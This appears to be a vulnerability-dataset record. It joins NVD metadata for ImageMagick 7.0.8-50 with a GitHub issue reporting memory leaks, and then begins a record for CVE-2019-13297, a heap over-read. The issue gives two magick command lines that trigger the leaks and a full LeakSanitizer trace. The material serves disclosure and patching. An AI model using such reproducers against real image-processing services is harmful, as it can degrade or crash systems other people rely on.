[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:imagemagick:imagemagick:7.0.8-50:q16:*:*:*:*:*:*", "matchCriteriaId": "25CCEA99-8329-46C6-9625-4FE15F24CF69", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:opensuse:leap:15.0:*:*:*:*:*:*:*", "matchCriteriaId": "F1E78106-58E6-4D59-990F-75DA575BFAD9", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:opensuse:leap:15.1:*:*:*:*:*:*:*", "matchCriteriaId": "B620311B-34A3-48A6-82DF-6F078D7A4493", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "401" ]
401
https://github.com/ImageMagick/ImageMagick/issues/1604
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "ImageMagick", "ImageMagick" ]
### Prerequisites - [x] I have written a descriptive issue title - [x] I have verified that I am using the latest version of ImageMagick - [x] I have searched [open](https://github.com/ImageMagick/ImageMagick/issues) and [closed](https://github.com/ImageMagick/ImageMagick/issues?q=is%3Aissue+is%3Aclosed) issues to ensure it has not already been reported ### Description <!-- A description of the bug or feature --> There're a direct memory leaks in AcquireMagickMemory of MagickCore/memory.c:478:10 and many indirect memory leaks. ### Steps to Reproduce <!-- List of steps, sample code, failing test or link to a project that reproduces the behavior. Make sure you place a stack trace inside a code (```) block to avoid linking unrelated issues --> run cmd: `magick -seed 0 "(" magick:netscape +repage ")" "(" magick:granite +repage ")" -append -fft -compare tmp` and this cmd also can trigger them. cmd: `magick -seed 0 -bias 0% "(" magick:rose +repage ")" "(" magick:rose -despeckle -threshold 26 -wave 55x83 ")" -sampling-factor 3.65x3.408 -channel RGBA -compare -mosaic -compare tmp` Here's ASAN result. ``` ==5674==ERROR: LeakSanitizer: detected memory leaks Direct leak of 13504 byte(s) in 1 object(s) allocated from: #0 0x4e5397 in __interceptor_malloc (install/bin/magick+0x4e5397) #1 0x7fdfed7f4146 in AcquireMagickMemory MagickCore/memory.c:478:10 #2 0x7fdfed7a1154 in AcquireCriticalMemory ./MagickCore/memory-private.h:64:10 #3 0x7fdfed7a5709 in CloneImage MagickCore/image.c:823:25 #4 0x7fdfed7a4a81 in AppendImages MagickCore/image.c:520:16 #5 0x7fdfecf6bd2d in CLIListOperatorImages MagickWand/operation.c:3795:22 #6 0x7fdfecf7834e in CLIOption MagickWand/operation.c:5276:14 #7 0x7fdfecdb9a99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7 #8 0x7fdfecdbad0a in MagickImageCommand MagickWand/magick-cli.c:796:5 #9 0x7fdfece04ba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14 #10 0x526f95 in MagickMain utilities/magick.c:149:10 #11 0x5268e1 in main utilities/magick.c:180:10 #12 0x7fdfe787bb96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) Indirect leak of 940032 byte(s) in 1 object(s) allocated from: #0 0x4e6200 in __interceptor_posix_memalign (install/bin/magick+0x4e6200) #1 0x7fdfed7f3f66 in AcquireAlignedMemory MagickCore/memory.c:265:7 #2 0x7fdfed53c6ac in OpenPixelCache MagickCore/cache.c:3728:46 #3 0x7fdfed542991 in GetImagePixelCache MagickCore/cache.c:1754:18 #4 0x7fdfed52a330 in QueueAuthenticPixelCacheNexus MagickCore/cache.c:4156:28 #5 0x7fdfed52a001 in GetAuthenticPixelCacheNexus MagickCore/cache.c:1324:10 #6 0x7fdfed54ca4e in GetCacheViewAuthenticPixels MagickCore/cache-view.c:312:10 #7 0x7fdfed7b43e1 in SetImageAlpha MagickCore/image.c:2372:7 #8 0x7fdfed8356d5 in ConformPixelInfo MagickCore/pixel.c:235:12 #9 0x7fdfed7a84e7 in SetImageBackgroundColor MagickCore/image.c:2441:3 #10 0x7fdfed7a4c47 in AppendImages MagickCore/image.c:533:10 #11 0x7fdfecf6bd2d in CLIListOperatorImages MagickWand/operation.c:3795:22 #12 0x7fdfecf7834e in CLIOption MagickWand/operation.c:5276:14 #13 0x7fdfecdb9a99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7 #14 0x7fdfecdbad0a in MagickImageCommand MagickWand/magick-cli.c:796:5 #15 0x7fdfece04ba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14 #16 0x526f95 in MagickMain utilities/magick.c:149:10 #17 0x5268e1 in main utilities/magick.c:180:10 #18 0x7fdfe787bb96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) Indirect leak of 22616 byte(s) in 1 object(s) allocated from: #0 0x4e5397 in __interceptor_malloc (install/bin/magick+0x4e5397) #1 0x7fdfed7f4146 in AcquireMagickMemory MagickCore/memory.c:478:10 #2 0x7fdfed7f41af in AcquireQuantumMemory MagickCore/memory.c:551:10 #3 0x7fdfed7a6b3d in CloneImage MagickCore/image.c:879:43 #4 0x7fdfed7a4a81 in AppendImages MagickCore/image.c:520:16 #5 0x7fdfecf6bd2d in CLIListOperatorImages MagickWand/operation.c:3795:22 #6 0x7fdfecf7834e in CLIOption MagickWand/operation.c:5276:14 #7 0x7fdfecdb9a99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7 #8 0x7fdfecdbad0a in MagickImageCommand MagickWand/magick-cli.c:796:5 #9 0x7fdfece04ba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14 #10 0x526f95 in MagickMain utilities/magick.c:149:10 #11 0x5268e1 in main utilities/magick.c:180:10 #12 0x7fdfe787bb96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) Indirect leak of 13024 byte(s) in 1 object(s) allocated from: #0 0x4e5397 in __interceptor_malloc (install/bin/magick+0x4e5397) #1 0x7fdfed7f4146 in AcquireMagickMemory MagickCore/memory.c:478:10 #2 0x7fdfed7a1154 in AcquireCriticalMemory ./MagickCore/memory-private.h:64:10 #3 0x7fdfed7a3793 in AcquireImageInfo MagickCore/image.c:350:28 #4 0x7fdfed7ac553 in CloneImageInfo MagickCore/image.c:945:14 #5 0x7fdfed7a36b8 in SyncImageSettings MagickCore/image.c:4242:21 #6 0x7fdfed7baea6 in SyncImagesSettings MagickCore/image.c:4000:12 #7 0x7fdfecf78153 in CLIOption MagickWand/operation.c:5243:14 #8 0x7fdfecdb9a99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7 #9 0x7fdfecdbad0a in MagickImageCommand MagickWand/magick-cli.c:796:5 #10 0x7fdfece04ba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14 #11 0x526f95 in MagickMain utilities/magick.c:149:10 #12 0x5268e1 in main utilities/magick.c:180:10 #13 0x7fdfe787bb96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) Indirect leak of 9152 byte(s) in 1 object(s) allocated from: #0 0x4e6200 in __interceptor_posix_memalign (install/bin/magick+0x4e6200) #1 0x7fdfed7f3f66 in AcquireAlignedMemory MagickCore/memory.c:265:7 #2 0x7fdfed526a04 in AcquirePixelCache MagickCore/cache.c:195:28 #3 0x7fdfed527f8d in ClonePixelCache MagickCore/cache.c:513:28 #4 0x7fdfed7a75df in CloneImage MagickCore/image.c:910:22 #5 0x7fdfed7a4a81 in AppendImages MagickCore/image.c:520:16 #6 0x7fdfecf6bd2d in CLIListOperatorImages MagickWand/operation.c:3795:22 #7 0x7fdfecf7834e in CLIOption MagickWand/operation.c:5276:14 #8 0x7fdfecdb9a99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7 #9 0x7fdfecdbad0a in MagickImageCommand MagickWand/magick-cli.c:796:5 #10 0x7fdfece04ba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14 #11 0x526f95 in MagickMain utilities/magick.c:149:10 #12 0x5268e1 in main utilities/magick.c:180:10 #13 0x7fdfe787bb96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) Indirect leak of 512 byte(s) in 1 object(s) allocated from: #0 0x4e5397 in __interceptor_malloc (install/bin/magick+0x4e5397) #1 0x7fdfed7f4146 in AcquireMagickMemory MagickCore/memory.c:478:10 #2 0x7fdfed7f41af in AcquireQuantumMemory MagickCore/memory.c:551:10 #3 0x7fdfed834f7a in AcquirePixelChannelMap MagickCore/pixel.c:101:35 #4 0x7fdfed835154 in ClonePixelChannelMap MagickCore/pixel.c:139:13 #5 0x7fdfed7a638f in CloneImage MagickCore/image.c:849:28 #6 0x7fdfed7a4a81 in AppendImages MagickCore/image.c:520:16 #7 0x7fdfecf6bd2d in CLIListOperatorImages MagickWand/operation.c:3795:22 #8 0x7fdfecf7834e in CLIOption MagickWand/operation.c:5276:14 #9 0x7fdfecdb9a99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7 #10 0x7fdfecdbad0a in MagickImageCommand MagickWand/magick-cli.c:796:5 #11 0x7fdfece04ba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14 #12 0x526f95 in MagickMain utilities/magick.c:149:10 #13 0x5268e1 in main utilities/magick.c:180:10 #14 0x7fdfe787bb96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) Indirect leak of 288 byte(s) in 1 object(s) allocated from: #0 0x4e5397 in __interceptor_malloc (install/bin/magick+0x4e5397) #1 0x7fdfed7f4146 in AcquireMagickMemory MagickCore/memory.c:478:10 #2 0x7fdfed504284 in AcquireCriticalMemory ./MagickCore/memory-private.h:64:10 #3 0x7fdfed505d5d in CloneBlobInfo MagickCore/blob.c:554:27 #4 0x7fdfed7a6848 in CloneImage MagickCore/image.c:867:25 #5 0x7fdfed7a4a81 in AppendImages MagickCore/image.c:520:16 #6 0x7fdfecf6bd2d in CLIListOperatorImages MagickWand/operation.c:3795:22 #7 0x7fdfecf7834e in CLIOption MagickWand/operation.c:5276:14 #8 0x7fdfecdb9a99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7 #9 0x7fdfecdbad0a in MagickImageCommand MagickWand/magick-cli.c:796:5 #10 0x7fdfece04ba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14 #11 0x526f95 in MagickMain utilities/magick.c:149:10 #12 0x5268e1 in main utilities/magick.c:180:10 #13 0x7fdfe787bb96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) Indirect leak of 192 byte(s) in 1 object(s) allocated from: #0 0x4e5397 in __interceptor_malloc (install/bin/magick+0x4e5397) #1 0x7fdfed7f4146 in AcquireMagickMemory MagickCore/memory.c:478:10 #2 0x7fdfed7f41af in AcquireQuantumMemory MagickCore/memory.c:551:10 #3 0x7fdfed5275df in AcquirePixelCacheNexus MagickCore/cache.c:271:29 #4 0x7fdfed526f8d in AcquirePixelCache MagickCore/cache.c:212:26 #5 0x7fdfed527f8d in ClonePixelCache MagickCore/cache.c:513:28 #6 0x7fdfed7a75df in CloneImage MagickCore/image.c:910:22 #7 0x7fdfed7a4a81 in AppendImages MagickCore/image.c:520:16 #8 0x7fdfecf6bd2d in CLIListOperatorImages MagickWand/operation.c:3795:22 #9 0x7fdfecf7834e in CLIOption MagickWand/operation.c:5276:14 #10 0x7fdfecdb9a99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7 #11 0x7fdfecdbad0a in MagickImageCommand MagickWand/magick-cli.c:796:5 #12 0x7fdfece04ba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14 #13 0x526f95 in MagickMain utilities/magick.c:149:10 #14 0x5268e1 in main utilities/magick.c:180:10 #15 0x7fdfe787bb96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) Indirect leak of 96 byte(s) in 3 object(s) allocated from: #0 0x4e5397 in __interceptor_malloc (install/bin/magick+0x4e5397) #1 0x7fdfed7f4146 in AcquireMagickMemory MagickCore/memory.c:478:10 #2 0x7fdfed94f073 in AddValueToSplayTree MagickCore/splay-tree.c:189:21 #3 0x7fdfed94ff7c in CloneSplayTree MagickCore/splay-tree.c:372:12 #4 0x7fdfed884f23 in CloneImageProperties MagickCore/property.c:196:25 #5 0x7fdfed7a5f99 in CloneImage MagickCore/image.c:839:10 #6 0x7fdfed7a4a81 in AppendImages MagickCore/image.c:520:16 #7 0x7fdfecf6bd2d in CLIListOperatorImages MagickWand/operation.c:3795:22 #8 0x7fdfecf7834e in CLIOption MagickWand/operation.c:5276:14 #9 0x7fdfecdb9a99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7 #10 0x7fdfecdbad0a in MagickImageCommand MagickWand/magick-cli.c:796:5 #11 0x7fdfece04ba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14 #12 0x526f95 in MagickMain utilities/magick.c:149:10 #13 0x5268e1 in main utilities/magick.c:180:10 #14 0x7fdfe787bb96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) Indirect leak of 88 byte(s) in 1 object(s) allocated from: #0 0x4e5397 in __interceptor_malloc (install/bin/magick+0x4e5397) #1 0x7fdfed7f4146 in AcquireMagickMemory MagickCore/memory.c:478:10 #2 0x7fdfed9540c4 in AcquireCriticalMemory ./MagickCore/memory-private.h:64:10 #3 0x7fdfed950155 in NewSplayTree MagickCore/splay-tree.c:1148:32 #4 0x7fdfed94fd64 in CloneSplayTree MagickCore/splay-tree.c:360:14 #5 0x7fdfed884f23 in CloneImageProperties MagickCore/property.c:196:25 #6 0x7fdfed7a5f99 in CloneImage MagickCore/image.c:839:10 #7 0x7fdfed7a4a81 in AppendImages MagickCore/image.c:520:16 #8 0x7fdfecf6bd2d in CLIListOperatorImages MagickWand/operation.c:3795:22 #9 0x7fdfecf7834e in CLIOption MagickWand/operation.c:5276:14 #10 0x7fdfecdb9a99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7 #11 0x7fdfecdbad0a in MagickImageCommand MagickWand/magick-cli.c:796:5 #12 0x7fdfece04ba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14 #13 0x526f95 in MagickMain utilities/magick.c:149:10 #14 0x5268e1 in main utilities/magick.c:180:10 #15 0x7fdfe787bb96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) Indirect leak of 80 byte(s) in 3 object(s) allocated from: #0 0x4e5397 in __interceptor_malloc (install/bin/magick+0x4e5397) #1 0x7fdfed7f4146 in AcquireMagickMemory MagickCore/memory.c:478:10 #2 0x7fdfed7f41af in AcquireQuantumMemory MagickCore/memory.c:551:10 #3 0x7fdfed987963 in ConstantString MagickCore/string.c:713:26 #4 0x7fdfed94ff66 in CloneSplayTree MagickCore/splay-tree.c:373:7 #5 0x7fdfed884f23 in CloneImageProperties MagickCore/property.c:196:25 #6 0x7fdfed7a5f99 in CloneImage MagickCore/image.c:839:10 #7 0x7fdfed7a4a81 in AppendImages MagickCore/image.c:520:16 #8 0x7fdfecf6bd2d in CLIListOperatorImages MagickWand/operation.c:3795:22 #9 0x7fdfecf7834e in CLIOption MagickWand/operation.c:5276:14 #10 0x7fdfecdb9a99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7 #11 0x7fdfecdbad0a in MagickImageCommand MagickWand/magick-cli.c:796:5 #12 0x7fdfece04ba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14 #13 0x526f95 in MagickMain utilities/magick.c:149:10 #14 0x5268e1 in main utilities/magick.c:180:10 #15 0x7fdfe787bb96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) Indirect leak of 64 byte(s) in 1 object(s) allocated from: #0 0x4e6200 in __interceptor_posix_memalign (install/bin/magick+0x4e6200) #1 0x7fdfed9397c1 in AcquireSemaphoreMemory MagickCore/semaphore.c:154:7 #2 0x7fdfed939003 in AcquireSemaphoreInfo MagickCore/semaphore.c:200:36 #3 0x7fdfed7a69df in CloneImage MagickCore/image.c:871:26 #4 0x7fdfed7a4a81 in AppendImages MagickCore/image.c:520:16 #5 0x7fdfecf6bd2d in CLIListOperatorImages MagickWand/operation.c:3795:22 #6 0x7fdfecf7834e in CLIOption MagickWand/operation.c:5276:14 #7 0x7fdfecdb9a99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7 #8 0x7fdfecdbad0a in MagickImageCommand MagickWand/magick-cli.c:796:5 #9 0x7fdfece04ba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14 #10 0x526f95 in MagickMain utilities/magick.c:149:10 #11 0x5268e1 in main utilities/magick.c:180:10 #12 0x7fdfe787bb96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) Indirect leak of 64 byte(s) in 1 object(s) allocated from: #0 0x4e6200 in __interceptor_posix_memalign (install/bin/magick+0x4e6200) #1 0x7fdfed9397c1 in AcquireSemaphoreMemory MagickCore/semaphore.c:154:7 #2 0x7fdfed939003 in AcquireSemaphoreInfo MagickCore/semaphore.c:200:36 #3 0x7fdfed5061ae in GetBlobInfo MagickCore/blob.c:1745:24 #4 0x7fdfed505d6a in CloneBlobInfo MagickCore/blob.c:555:3 #5 0x7fdfed7a6848 in CloneImage MagickCore/image.c:867:25 #6 0x7fdfed7a4a81 in AppendImages MagickCore/image.c:520:16 #7 0x7fdfecf6bd2d in CLIListOperatorImages MagickWand/operation.c:3795:22 #8 0x7fdfecf7834e in CLIOption MagickWand/operation.c:5276:14 #9 0x7fdfecdb9a99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7 #10 0x7fdfecdbad0a in MagickImageCommand MagickWand/magick-cli.c:796:5 #11 0x7fdfece04ba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14 #12 0x526f95 in MagickMain utilities/magick.c:149:10 #13 0x5268e1 in main utilities/magick.c:180:10 #14 0x7fdfe787bb96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) Indirect leak of 64 byte(s) in 1 object(s) allocated from: #0 0x4e6200 in __interceptor_posix_memalign (install/bin/magick+0x4e6200) #1 0x7fdfed9397c1 in AcquireSemaphoreMemory MagickCore/semaphore.c:154:7 #2 0x7fdfed939003 in AcquireSemaphoreInfo MagickCore/semaphore.c:200:36 #3 0x7fdfed527383 in AcquirePixelCache MagickCore/cache.c:231:30 #4 0x7fdfed527f8d in ClonePixelCache MagickCore/cache.c:513:28 #5 0x7fdfed7a75df in CloneImage MagickCore/image.c:910:22 #6 0x7fdfed7a4a81 in AppendImages MagickCore/image.c:520:16 #7 0x7fdfecf6bd2d in CLIListOperatorImages MagickWand/operation.c:3795:22 #8 0x7fdfecf7834e in CLIOption MagickWand/operation.c:5276:14 #9 0x7fdfecdb9a99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7 #10 0x7fdfecdbad0a in MagickImageCommand MagickWand/magick-cli.c:796:5 #11 0x7fdfece04ba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14 #12 0x526f95 in MagickMain utilities/magick.c:149:10 #13 0x5268e1 in main utilities/magick.c:180:10 #14 0x7fdfe787bb96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) Indirect leak of 64 byte(s) in 1 object(s) allocated from: #0 0x4e6200 in __interceptor_posix_memalign (install/bin/magick+0x4e6200) #1 0x7fdfed9397c1 in AcquireSemaphoreMemory MagickCore/semaphore.c:154:7 #2 0x7fdfed939003 in AcquireSemaphoreInfo MagickCore/semaphore.c:200:36 #3 0x7fdfed5272f4 in AcquirePixelCache MagickCore/cache.c:229:25 #4 0x7fdfed527f8d in ClonePixelCache MagickCore/cache.c:513:28 #5 0x7fdfed7a75df in CloneImage MagickCore/image.c:910:22 #6 0x7fdfed7a4a81 in AppendImages MagickCore/image.c:520:16 #7 0x7fdfecf6bd2d in CLIListOperatorImages MagickWand/operation.c:3795:22 #8 0x7fdfecf7834e in CLIOption MagickWand/operation.c:5276:14 #9 0x7fdfecdb9a99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7 #10 0x7fdfecdbad0a in MagickImageCommand MagickWand/magick-cli.c:796:5 #11 0x7fdfece04ba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14 #12 0x526f95 in MagickMain utilities/magick.c:149:10 #13 0x5268e1 in main utilities/magick.c:180:10 #14 0x7fdfe787bb96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) Indirect leak of 64 byte(s) in 1 object(s) allocated from: #0 0x4e6200 in __interceptor_posix_memalign (install/bin/magick+0x4e6200) #1 0x7fdfed7f3f66 in AcquireAlignedMemory MagickCore/memory.c:265:7 #2 0x7fdfed5274e2 in AcquirePixelCacheNexus MagickCore/cache.c:267:29 #3 0x7fdfed526f8d in AcquirePixelCache MagickCore/cache.c:212:26 #4 0x7fdfed527f8d in ClonePixelCache MagickCore/cache.c:513:28 #5 0x7fdfed7a75df in CloneImage MagickCore/image.c:910:22 #6 0x7fdfed7a4a81 in AppendImages MagickCore/image.c:520:16 #7 0x7fdfecf6bd2d in CLIListOperatorImages MagickWand/operation.c:3795:22 #8 0x7fdfecf7834e in CLIOption MagickWand/operation.c:5276:14 #9 0x7fdfecdb9a99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7 #10 0x7fdfecdbad0a in MagickImageCommand MagickWand/magick-cli.c:796:5 #11 0x7fdfece04ba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14 #12 0x526f95 in MagickMain utilities/magick.c:149:10 #13 0x5268e1 in main utilities/magick.c:180:10 #14 0x7fdfe787bb96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) Indirect leak of 64 byte(s) in 1 object(s) allocated from: #0 0x4e6200 in __interceptor_posix_memalign (install/bin/magick+0x4e6200) #1 0x7fdfed9397c1 in AcquireSemaphoreMemory MagickCore/semaphore.c:154:7 #2 0x7fdfed939003 in AcquireSemaphoreInfo MagickCore/semaphore.c:200:36 #3 0x7fdfed9503c9 in NewSplayTree MagickCore/splay-tree.c:1159:25 #4 0x7fdfed94fd64 in CloneSplayTree MagickCore/splay-tree.c:360:14 #5 0x7fdfed884f23 in CloneImageProperties MagickCore/property.c:196:25 #6 0x7fdfed7a5f99 in CloneImage MagickCore/image.c:839:10 #7 0x7fdfed7a4a81 in AppendImages MagickCore/image.c:520:16 #8 0x7fdfecf6bd2d in CLIListOperatorImages MagickWand/operation.c:3795:22 #9 0x7fdfecf7834e in CLIOption MagickWand/operation.c:5276:14 #10 0x7fdfecdb9a99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7 #11 0x7fdfecdbad0a in MagickImageCommand MagickWand/magick-cli.c:796:5 #12 0x7fdfece04ba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14 #13 0x526f95 in MagickMain utilities/magick.c:149:10 #14 0x5268e1 in main utilities/magick.c:180:10 #15 0x7fdfe787bb96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) Indirect leak of 32 byte(s) in 3 object(s) allocated from: #0 0x4e5397 in __interceptor_malloc (install/bin/magick+0x4e5397) #1 0x7fdfed7f4146 in AcquireMagickMemory MagickCore/memory.c:478:10 #2 0x7fdfed7f41af in AcquireQuantumMemory MagickCore/memory.c:551:10 #3 0x7fdfed987963 in ConstantString MagickCore/string.c:713:26 #4 0x7fdfed94fee1 in CloneSplayTree MagickCore/splay-tree.c:372:43 #5 0x7fdfed884f23 in CloneImageProperties MagickCore/property.c:196:25 #6 0x7fdfed7a5f99 in CloneImage MagickCore/image.c:839:10 #7 0x7fdfed7a4a81 in AppendImages MagickCore/image.c:520:16 #8 0x7fdfecf6bd2d in CLIListOperatorImages MagickWand/operation.c:3795:22 #9 0x7fdfecf7834e in CLIOption MagickWand/operation.c:5276:14 #10 0x7fdfecdb9a99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7 #11 0x7fdfecdbad0a in MagickImageCommand MagickWand/magick-cli.c:796:5 #12 0x7fdfece04ba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14 #13 0x526f95 in MagickMain utilities/magick.c:149:10 #14 0x5268e1 in main utilities/magick.c:180:10 #15 0x7fdfe787bb96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) SUMMARY: AddressSanitizer: 1000000 byte(s) leaked in 24 allocation(s). ``` ### System Configuration <!-- Tell us about the environment where you are experiencing the bug --> - ImageMagick version: Version: ImageMagick 7.0.8-50 Q16 x86_64 2019-06-18 https://imagemagick.org - Environment (Operating system, version and so on): Description: Ubuntu 18.04.1 LTS Release: 18.04 Codename: bionic - Additional information: CC=clang-7 CXX=clang++-7 ./configure --disable-openmp <!-- Thanks for reporting the issue to ImageMagick! -->
Direct memory leaks in AcquireMagickMemory and indirect memory leaks
https://api.github.com/repos/ImageMagick/ImageMagick/issues/1604/comments
2
2019-06-18T17:22:26Z
2019-07-08T01:48:39Z
https://github.com/ImageMagick/ImageMagick/issues/1604
457,603,906
1,604
486
CVE-2019-13297
2019-07-05T01:15:10.047
ImageMagick 7.0.8-50 Q16 has a heap-based buffer over-read at MagickCore/threshold.c in AdaptiveThresholdImage because a height of zero is mishandled.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00069.html" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/commit/604588fc35c7585abb7a9e71f69bb82e4389fefc" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/issues/1609" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick6/commit/35c7032723d85eee7318ff6c82f031fa2666b773" }, { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2019/08/msg00021.html" }, { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2020/08/msg00030.html" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://usn.ubuntu.com/4192-1/" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://www.debian.org/security/2020/dsa-4712" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00069.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/commit/604588fc35c7585abb7a9e71f69bb82e4389fefc" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/issues/1609" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick6/commit/35c7032723d85eee7318ff6c82f031fa2666b773" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2019/08/msg00021.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2020/08/msg00030.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://usn.ubuntu.com/4192-1/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://www.debian.org/security/2020/dsa-4712" } ]
